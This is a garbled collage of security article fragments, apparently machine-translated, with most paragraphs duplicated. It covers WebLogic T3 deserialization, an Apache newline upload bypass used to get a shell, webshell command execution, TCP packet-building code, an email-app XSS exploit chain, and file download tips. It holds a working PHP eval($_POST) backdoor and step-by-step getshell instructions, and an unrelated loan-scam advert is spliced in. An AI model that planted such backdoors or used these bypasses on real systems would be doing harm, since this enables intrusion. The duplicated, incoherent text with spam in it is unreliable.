T3 Muxer deserializes socket data
Calls process repeatedly
Initiates ms, a MuxableSocketT3, follows into readReadySocket where the connection is described, calls readReadySocketOnce where the description continues, then calls dispatch to proceed with the call
Calls process repeatedly
Initiates ms, a MuxableSocketT3, follows into readReadySocket where the connection is described, calls readReadySocketOnce where the description continues, then calls dispatch to proceed with the call
ms acquisition acquisition, here for parsing devices, then distributing to the corresponding calls, and then based on the data we export here, determining the protocol, returning connection calls, creating related NIOSocketMuxersocketsMuxableSocketDiscriminatorMuxer
Bypassing blacklist getshell
Uploading a normal php file is blocked
You can upload 1.php.xxx, but it is not parsed, indicating that the old Apache parsing vulnerability does not exist
We use CVE-2017-15715 to upload a file containing a newline character. Note, it must be \x0A only, not \x0D\x0A, so we use the hex function to add a \x0A after 1.php, then access /1.php%0A, and you will find that getshell is successful
Uploading a normal php file is blocked
You can upload 1.php.xxx, but it is not parsed, indicating that the old Apache parsing vulnerability does not exist
We use CVE-2017-15715 to upload a file containing a newline character. Note, it must be \x0A only, not \x0D\x0A, so we use the hex function to add a \x0A after 1.php, then access /1.php%0A, and you will find that getshell is successful
Interactive Shell under WebShell
Starting from the current situation of executing commands from webshell
Here we mainly talk about the Linux platform, and temporarily do not mention Windows (mainly because it has not been studied yet).
Executing commands in web scripts
In Webshell, you often see some command execution, virtual terminal, and other functions that can execute system commands. The principle is to use functions provided by the scripting language itself such as system, popen, shell_exec to achieve the purpose of executing commands.
This method does not support context, and it becomes quite inconvenient when facing commands that require user interaction. For example, the passwd command.
Starting from the current situation of executing commands from webshell
Here we mainly talk about the Linux platform, and temporarily do not mention Windows (mainly because it has not been studied yet).
Executing commands in web scripts
In Webshell, you often see some command execution, virtual terminal, and other functions that can execute system commands. The principle is to use functions provided by the scripting language itself such as system, popen, shell_exec to achieve the purpose of executing commands.
This method does not support context, and it becomes quite inconvenient when facing commands that require user interaction. For example, the passwd command.
Assembling TCP protocol template_set_target(), partial code
case Proto_TCP:
px[offset_tcp+ 0] = (unsigned char)(port_me >> 8);
px[offset_tcp+ 1] = (unsigned char)(port_me & 0xFF);
px[offset_tcp+ 2] = (unsigned char)(port_them >> 8);
px[offset_tcp+ 3] = (unsigned char)(port_them & 0xFF);
px[offset_tcp+ 4] = (unsigned char)(seqno >> 24);
px[offset_tcp+ 5] = (unsigned char)(seqno >> 16);
px[offset_tcp+ 6] = (unsigned char)(seqno >> 8);
px[offset_tcp+ 7] = (unsigned char)(seqno >> 0);
xsum += (uint64_t)tmpl->checksum_tcp
+ (uint64_t)ip_me
+ (uint64_t)ip_them
+ (uint64_t)port_me
+ (uint64_t)port_them
+ (uint64_t)seqno;
xsum = (xsum >> 16) + (xsum & 0xFFFF);
xsum = (xsum >> 16) + (xsum & 0xFFFF);
xsum = (xsum >> 16) + (xsum & 0xFFFF);
xsum = ~xsum;
case Proto_TCP:
px[offset_tcp+ 0] = (unsigned char)(port_me >> 8);
px[offset_tcp+ 1] = (unsigned char)(port_me & 0xFF);
px[offset_tcp+ 2] = (unsigned char)(port_them >> 8);
px[offset_tcp+ 3] = (unsigned char)(port_them & 0xFF);
px[offset_tcp+ 4] = (unsigned char)(seqno >> 24);
px[offset_tcp+ 5] = (unsigned char)(seqno >> 16);
px[offset_tcp+ 6] = (unsigned char)(seqno >> 8);
px[offset_tcp+ 7] = (unsigned char)(seqno >> 0);
xsum += (uint64_t)tmpl->checksum_tcp
+ (uint64_t)ip_me
+ (uint64_t)ip_them
+ (uint64_t)port_me
+ (uint64_t)port_them
+ (uint64_t)seqno;
xsum = (xsum >> 16) + (xsum & 0xFFFF);
xsum = (xsum >> 16) + (xsum & 0xFFFF);
xsum = (xsum >> 16) + (xsum & 0xFFFF);
xsum = ~xsum;
Bug 3: … and file:/// cross-domain
Although in Bug 2 we confirmed that this XSS indeed exists, there are still some issues with introducing a JS exploit through this XSS and obtaining code execution privileges (shell). Typically, if the EML file itself is too large, it will affect the WebView heap layout, thereby reducing the success rate of heap feng shui. However, the Email app did not disappoint; it enabled setAllowFileAccessFromFileUrls, which means we can split the JS exploit into separate files and reference them via script src, thus minimizing the size of the EML file as much as possible to improve the success rate of the V8 vulnerability. A small tip: combining Bug 2 and Bug 3 already allows arbitrary reading of private Email files. This vulnerability was assigned CVE-2018-10498. Therefore, we now construct the sample attack EML file as shown below.
Although in Bug 2 we confirmed that this XSS indeed exists, there are still some issues with introducing a JS exploit through this XSS and obtaining code execution privileges (shell). Typically, if the EML file itself is too large, it will affect the WebView heap layout, thereby reducing the success rate of heap feng shui. However, the Email app did not disappoint; it enabled setAllowFileAccessFromFileUrls, which means we can split the JS exploit into separate files and reference them via script src, thus minimizing the size of the EML file as much as possible to improve the success rate of the V8 vulnerability. A small tip: combining Bug 2 and Bug 3 already allows arbitrary reading of private Email files. This vulnerability was assigned CVE-2018-10498. Therefore, we now construct the sample attack EML file as shown below.
Online loan
Real-time nationwide new followers 30, intentions 15, 7% effectiveness
Can filter overnight regions
@Mikelaotoo
Real-time nationwide new followers 30, intentions 15, 7% effectiveness
Can filter overnight regions
@Mikelaotoo
2serialFilter assignment process
Let's see how weblogic initializes this value. When weblogic starts the t3Server, it initializes the filter. During initialization, it first instantiates the class, here JreFilterApiProxy.
Before initialization, both FilterProperties and BlacklistProperties are null and both return false, then the processDefaultConfiguration method is called.
@Mikelaotoo
Let's see how weblogic initializes this value. When weblogic starts the t3Server, it initializes the filter. During initialization, it first instantiates the class, here JreFilterApiProxy.
Before initialization, both FilterProperties and BlacklistProperties are null and both return false, then the processDefaultConfiguration method is called.
@Mikelaotoo
Code injection:
Assuming o.php is the backdoor left by the hacker:
<?php
eval(''.$_POST['s']);
?>
Because Ant Sword obtains cookies, it needs to call the header function:
<?php
eval(''.$_POST['s']);
header("set-cookie:aaa=<img id=\"1\">;");
?>
Assuming o.php is the backdoor left by the hacker:
<?php
eval(''.$_POST['s']);
?>
Because Ant Sword obtains cookies, it needs to call the header function:
<?php
eval(''.$_POST['s']);
header("set-cookie:aaa=<img id=\"1\">;");
?>
Three Tips for Arbitrary File Download on Windows
I saw two ideas proposed in the group, did some simple tests, and added a new idea.
Since it is necessary to read some files used by system services or user files, generally SYSTEM or administrators privileges are required.
I saw two ideas proposed in the group, did some simple tests, and added a new idea.
Since it is necessary to read some files used by system services or user files, generally SYSTEM or administrators privileges are required.